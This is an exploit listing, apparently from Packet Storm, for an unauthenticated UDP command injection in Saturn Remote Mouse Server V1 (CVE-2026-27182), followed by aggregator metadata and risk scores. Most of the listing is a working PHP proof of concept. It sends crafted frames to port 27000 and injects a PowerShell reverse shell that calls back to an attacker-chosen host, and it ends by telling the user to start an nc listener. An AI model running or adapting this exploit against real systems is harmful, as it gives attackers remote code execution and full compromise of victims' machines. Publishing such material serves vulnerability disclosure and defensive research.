📄 Saturn Remote Mouse Server 1 Command Injection

🗓️ 18 Feb 2026 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 110 Views

Unauthenticated UDP frames on port 27000 allow remote code execution in Saturn Remote Mouse Server V1.

Reporter	Title	Published	Views	Family All 8
Circl	CVE-2026-27182	18 Feb 202622:19	–	circl
CNNVD	Saturn Remote Mouse Server 访问控制错误漏洞	18 Feb 202600:00	–	cnnvd
CVE	CVE-2026-27182	18 Feb 202620:59	–	cve
Cvelist	CVE-2026-27182 Saturn Remote Mouse Server UDP Command Injection RCE	18 Feb 202620:59	–	cvelist
NVD	CVE-2026-27182	18 Feb 202622:16	–	nvd
Positive Technologies	PT-2026-20518	18 Feb 202600:00	–	ptsecurity
RedhatCVE	CVE-2026-27182	20 Feb 202601:22	–	redhatcve
Vulnrichment	CVE-2026-27182 Saturn Remote Mouse Server UDP Command Injection RCE	18 Feb 202620:59	–	vulnrichment

=============================================================================================================================================
    | # Title     : Saturn Remote Mouse Server V1 - UDP-based Command Injection Vulnerability                                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://www.saturnremote.com/                                                                                               |
    =============================================================================================================================================
    
    [+] Summary    : A service component of Saturn Remote Mouse Server listens for unauthenticated UDP JSON-like frames on UDP port 27000. 
                     Improper input handling allows specially crafted frames to cause execution of arbitrary commands within the context 
    				 of the service process, resulting in Remote Code Execution (RCE) on the target host accessible from the local network.
    
    [+] Impact:
    
    Remote, unauthenticated attackers on the same local network can send malformed or specially crafted UDP packets that the server parses and forwards to 
    a command execution sink, enabling arbitrary code execution under the service account. This may result in full system compromise depending on service privileges.
    
    [+] Vectors:
    
    - UDP packets containing JSON frames (port 27000) with fields which are concatenated or passed directly to OS execution functions or PowerShell without validation or sanitization.
    - No authentication or origin validation observed for packets arriving from local network.
    
    
    
    [+] POC : php poc.php --lhost 192.168.1.3 --lport 4444
    
    
    <?php
    
    function main() {
    
        $options = getopt("", ["lhost:", "lport:"]);
        
        if (!isset($options['lhost']) || !isset($options['lport'])) {
            echo "Usage: php " . basename(__FILE__) . " --lhost <LHOST> --lport <LPORT>\n";
            exit(1);
        }
        
        $lhost = $options['lhost'];
        $lport = intval($options['lport']);
        
        $UDP_IP = "192.168.1.109";
        $UDP_PORT = 27000;
    
        $messages = [
            "7b224973436f6e6e656374696e67223a2274727565227d",
            "7b22636f6e6e656374696f6e223a2022616374697665227d",
            "7b2241726561486569676874223a302c22417265615769647468223a302c22436f6d6d616e644e616d65223a225354415254222c2258223a302c2259223a307d",
            "7b224b6579223a22636d64227d",
            "7b224b6579223a225c6e227d",
        ];
    
        $ps_command = "powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient('$lhost',$lport);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\"";
        
        $hex_ps = bin2hex("{\"Key\": \"$ps_command\"}");
        $messages[] = $hex_ps;
        $messages[] = "7b224b6579223a225c6e227d";
        
        echo "[*] Sending UDP packets to $UDP_IP:$UDP_PORT\n";
        echo "[*] Target listener: $lhost:$lport\n\n";
        
        foreach ($messages as $i => $hex_msg) {
            $data = hex2bin($hex_msg);
            if ($data === false) {
                echo "[!] Invalid hex for message " . ($i + 1) . "\n";
                continue;
            }
    
            $fp = fsockopen("udp://$UDP_IP", $UDP_PORT, $errno, $errstr);
            if (!$fp) {
                echo "[!] Cannot open UDP socket: $errstr ($errno)\n";
                break;
            }
            
            fwrite($fp, $data);
            fclose($fp);
            
            echo "[+] Sent packet " . ($i + 1) . " (" . strlen($data) . " bytes)\n";
            
            sleep(1);
        }
        
        echo "\n[+] All packets sent!\n";
        echo "[*] Start your listener: nc -nlvp $lport\n";
    }
    
    main();
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

18 Feb 2026 00:00Current

6.8Medium risk

Vulners AI Score6.8

CVSS 3.18.4

CVSS 48.6

EPSS0.01209

SSVC